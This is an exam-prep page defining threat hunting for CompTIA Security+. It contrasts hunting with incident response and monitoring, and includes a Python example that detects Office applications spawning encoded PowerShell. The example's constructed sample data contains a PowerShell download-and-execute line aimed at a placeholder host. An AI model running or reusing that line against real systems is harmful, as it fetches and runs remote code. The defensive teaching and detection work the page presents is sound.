Threat hunting — SY0-701
Threat hunting defined for CompTIA Security+ SY0-701: what it is, how it differs from incident response, and the exam misconceptions candidates need to avoid.
WHAT IT IS
Threat hunting is the proactive, analyst-driven search for evidence of adversary activity that has not yet been detected by automated tools. Rather than waiting for an alert to trigger an investigation, a threat hunter formulates a hypothesis about how a threat actor — defined by NIST SP 800-150 as "an individual or a group posing a threat" — might be operating inside an environment, then searches for technical artifacts or observables consistent with that hypothesis.
Those artifacts, once surfaced, are what NIST SP 800-61r3 calls indicators of compromise (IOCs): "technical artifacts or observables that suggest that an attack is imminent or is currently underway or that a compromise may have already occurred." Threat hunting seeks IOCs before an automated system raises an alarm about them. In practice the hypothesis is usually framed around adversary behavior (a tactic or technique) rather than around atomic indicators such as file hashes or IP addresses, because behavior is far harder for an adversary to change than an indicator.
Mental model
Think of threat hunting as asking a question before you have evidence of a problem: "If a threat actor were using a technique documented in MITRE ATT&CK — a knowledge base of adversary tactics and techniques based on real-world observations — what would their activity look like in my logs, and is it already there?"
The hunt begins with a hypothesis grounded in threat intelligence — "threat information that has been aggregated, transformed, analyzed, interpreted, or enriched to provide the necessary context for decision-making processes" (NIST SP 800-150) — then proceeds to collection, analysis, and either confirmation or refutation of that hypothesis. A hunt that confirms adversary activity hands off to incident response. A hunt that finds nothing should still produce something: a reusable query or detection rule for the behavior searched for, and a list of hosts or log sources whose missing telemetry meant the question could not be fully answered.
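The loop above (hypothesis, collection, analysis, confirm or refute, then hand off or improve coverage) as a worked example. This is added code, not part of the original page or of any CompTIA or NIST material: the hypothesis (Office applications spawning PowerShell with an encoded command, which maps to ATT&CK technique T1059.001, PowerShell), the process-creation event format, the host names and every event are constructed for illustration.

```python
"""Hypothesis-driven hunt over constructed process-creation events.

Added example, not from the original page. The hypothesis, the log
format, the host names and all events below are assumptions made up
for illustration.
"""
import base64
import re
from dataclasses import dataclass, field

# Hypothesis (assumed): a threat actor is delivering documents whose
# macros launch PowerShell with an encoded command (ATT&CK T1059.001).
# If true, process-creation telemetry should show an Office binary as the
# parent of powershell.exe with -EncodedCommand / -enc on the command line.
HYPOTHESIS = "Office application spawns powershell.exe with an encoded command (T1059.001)"
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (case-insensitive).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


@dataclass
class Event:
    host: str
    parent: str     # parent process image name
    image: str      # created process image name
    cmdline: str


@dataclass
class HuntResult:
    hypothesis: str
    hits: list = field(default_factory=list)
    hosts_with_telemetry: set = field(default_factory=set)
    hosts_expected: set = field(default_factory=set)

    @property
    def confirmed(self) -> bool:
        return bool(self.hits)

    @property
    def coverage_gaps(self) -> set:
        # Hosts that should have reported process events but reported none:
        # on these the hypothesis is untested, not refuted.
        return self.hosts_expected - self.hosts_with_telemetry


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; surface it as an observable."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def hunt(events, expected_hosts) -> HuntResult:
    """Collection + analysis step: test every event against the hypothesis."""
    result = HuntResult(hypothesis=HYPOTHESIS, hosts_expected=set(expected_hosts))
    for ev in events:
        result.hosts_with_telemetry.add(ev.host)
        if ev.parent.lower() not in OFFICE_PARENTS or ev.image.lower() != "powershell.exe":
            continue
        match = ENC_FLAG.search(ev.cmdline)
        if not match:
            continue
        result.hits.append({
            "host": ev.host,
            "parent": ev.parent,
            "decoded": decode_encoded_command(match.group(1)),
        })
    return result


def next_step(result: HuntResult) -> str:
    """Outcome of the hunt: hand off to IR, or bank the query and fix visibility."""
    if result.confirmed:
        hosts = sorted({h["host"] for h in result.hits})
        return f"Confirmed on {hosts}: hand off to incident response"
    gaps = sorted(result.coverage_gaps)
    return f"Refuted on hunted hosts; keep query as detection candidate; telemetry gaps: {gaps}"


def sample_events():
    """Constructed events (not real logs). One benign PowerShell use, one hit."""
    payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    blob = base64.b64encode(payload.encode("utf-16-le")).decode()
    return [
        Event("ws-01", "explorer.exe", "powershell.exe", "powershell.exe -NoProfile -File backup.ps1"),
        Event("ws-02", "WINWORD.EXE", "powershell.exe", f"powershell.exe -w hidden -enc {blob}"),
        Event("ws-02", "WINWORD.EXE", "splwow64.exe", "splwow64.exe 12288"),
        Event("ws-03", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ]


if __name__ == "__main__":
    # ws-04 is in scope for the hunt but sent no telemetry: a coverage gap.
    res = hunt(sample_events(), ["ws-01", "ws-02", "ws-03", "ws-04"])
    for hit in res.hits:
        print(f"{hit['host']}: {hit['parent']} -> powershell.exe, decoded: {hit['decoded']}")
    print(next_step(res))
```

The benign `explorer.exe -> powershell.exe -File` event is deliberately not a hit: the hypothesis is about the parent/child relationship plus the encoded flag, not about PowerShell use in general, which is why a hunt query is usually narrower than a generic monitoring rule. Filtering out the ws-02 event and re-running `hunt` shows the refuted path, where the value of the exercise is the reusable query and the list of hosts that produced no telemetry.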
When to use it
The exam frequently tests whether a candidate can distinguish threat hunting from incident response. The key boundary: threat hunting is initiated by the analyst; incident response is initiated by an event.
| Dimension | Threat Hunting | Incident Response |
|---|---|---|
| Trigger | Analyst hypothesis, not an alert | A detected event or confirmed incident |
| Goal | Find unknown or undetected activity | Mitigate violations of security policies (NIST SP 800-61r3) |
| Starting point | Threat intelligence, known adversary TTPs | An alert, user report, or automated detection |
| Outcome | Improved detection; possible handoff to IR | Containment, eradication, recovery |
| State of the threat | Assumed present but not yet confirmed | Known or suspected to have occurred |
MITRE ATT&CK supports hunting by providing a common language to structure, compare, and analyze threat intelligence, and by enabling analysts to develop analytics that detect the techniques used by an adversary.
COMMON MISCONCEPTION
The exam-relevant trap is conflating threat hunting with incident response or with routine security monitoring. Threat hunting is not the same as reviewing SIEM alerts — monitoring waits for a signal, hunting actively searches in the absence of one. It is also not the same as incident response: incident response is reactive ("we have a confirmed event; now mitigate it"), whereas threat hunting is initiated before a formal incident is declared.
A related misconception is that threat hunting produces confirmed incidents. More often it refutes a hypothesis, and the value lies in the improved detection logic or visibility gaps uncovered during the process — not exclusively in catching a live attacker.
How it shows up on the exam
The cognitive target is distinguishing between proactive and reactive security operations. Candidates are often tested on scenarios where an organization "suspects" adversary activity with no alert — the correct framing is threat hunting, not incident response, and not vulnerability scanning. Signal phrases that point toward threat hunting include: "no alert was triggered," "the analyst suspected," "proactively searched," "hypothesis-driven," or references to using adversary TTPs or threat intelligence as a starting point rather than a confirmed detection.
Candidates sometimes confuse threat hunting with threat intelligence itself. Threat intelligence is the enriched information used to form a hunting hypothesis; the hunt is the active search process that operationalizes that intelligence.
Related concepts
Sources
Every claim on this page traces to the public exam blueprint and official documentation: